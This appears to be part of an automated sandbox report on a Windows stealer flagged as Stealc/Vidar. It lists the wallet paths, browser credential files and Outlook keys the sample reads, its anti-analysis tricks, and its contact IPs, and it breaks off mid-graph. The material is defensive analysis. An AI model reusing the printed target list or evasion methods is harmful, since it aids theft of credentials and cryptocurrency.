Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2619375968.00000000006CA000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonA
Source: eb98fe5174.exe, 00000007.00000002.2619375968.00000000006CA000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: file__0.localstorage
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
Source: eb98fe5174.exe, 00000007.00000002.2619375968.00000000006CA000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: MultiDoge
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 53c7d901f1.exe PID: 7996, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0C40 sqlite3_bind_zeroblob, 7_2_6CAC0C40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0D60 sqlite3_bind_parameter_name, 7_2_6CAC0D60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E8EA0 sqlite3_clear_bindings, 7_2_6C9E8EA0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 7_2_6CAC0B40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E6410 bind,WSAGetLastError, 7_2_6C9E6410
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E60B0 listen,WSAGetLastError, 7_2_6C9E60B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9EC030 sqlite3_bind_parameter_count, 7_2_6C9EC030
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9EC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 7_2_6C9EC050
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E6070 PR_Listen, 7_2_6C9E6070
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9722D0 sqlite3_bind_blob, 7_2_6C9722D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E63C0 PR_Bind, 7_2_6C9E63C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502390 Sample: file.exe Startdate: 01/09/2024 Architecture: WINDOWS Score: 100 69 sni1gl.wpc.nucdn.net 2->69 71 scdn1f005.wpc.ad629.nucdn.net 2->71 73 chrome.cloudflare-dns.com 2->73 97 Multi AV Scanner detection for domain / URL 2->97 99 Suricata IDS alerts for network traffic 2->99 101 Found malware configuration 2->101 103 12 other signatures 2->103 9 explorti.exe 21 2->9         started        14 file.exe 5 2->14         started        16 msedge.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 89 185.215.113.19, 49737, 49739, 49741 WHOLESALECONNECTIONSNL Portugal 9->89 91 185.215.113.16, 49738, 49740, 49743 WHOLESALECONNECTIONSNL Portugal 9->91 53 C:\Users\user\AppData\...\53c7d901f1.exe, PE32 9->53 dropped 55 C:\Users\user\AppData\...\eb98fe5174.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\...\8eb30d7f71.exe, PE32 9->57 dropped 67 2 other files (none is malicious) 9->67 dropped 129 Hides threads from debuggers 9->129 131 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->131 133 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 9->133 20 eb98fe5174.exe 33 9->20         started        25 53c7d901f1.exe 13 9->25         started        27 8eb30d7f71.exe 9->27         started        59 C:\Users\user\AppData\Local\...\explorti.exe, PE32 14->59 dropped 61 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 14->61 dropped 135 Detected unpacking (changes PE section rights) 14->135 137 Found many strings related to Crypto-Wallets (likely being stolen) 14->137 139 Tries to evade debugger and weak emulator (self modifying code) 14->139 141 Tries to detect virtualization through RDTSC time measurements 14->141 29 explorti.exe 14->29         started        63 C:\Users\user\AppData\Local\...\Login Data, SQLite 16->63 dropped 65 C:\Users\user\AppData\Local\...\History, SQLite 16->65 dropped 143 Creates multiple autostart registry keys 16->143 145 Maps a DLL or memory area into another process 16->145 31 msedge.exe 16->31         started        37 3 other processes 16->37 93 192.168.2.4, 138, 443, 49296 unknown unknown 18->93 95 239.255.255.250 unknown Reserved 18->95 33 msedge.exe 18->33         started        35 msedge.exe 18->35         started        39 5 other processes 18->39 file6 signatures7 process8 dnsIp9 75 185.215.113.100, 49742, 49796, 80 WHOLESALECONNECTIONSNL Portugal 20->75 45 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 20->45 dropped 47 C:\Users\user\AppData\...\softokn3[1].dll, PE32 20->47 dropped 49 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 20->49 dropped 51 9 other files (none is malicious) 20->51 dropped 105 Detected unpacking (changes PE section rights) 20->105 107 Tries to steal Mail credentials (via file / registry access) 20->107 109 Found many strings related to Crypto-Wallets (likely being stolen) 20->109 127 4 other signatures 20->127 111 Tries to detect sandboxes and other dynamic analysis tools (window names) 25->111 113 Tries to detect sandboxes / dynamic malware analysis system (registry check) 25->113 115 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 25->115 117 Binary is likely a compiled AutoIt script file 27->117 41 msedge.exe 3 22 27->41         started        119 Tries to evade debugger and weak emulator (self modifying code) 29->119 121 Tries to detect virtualization through 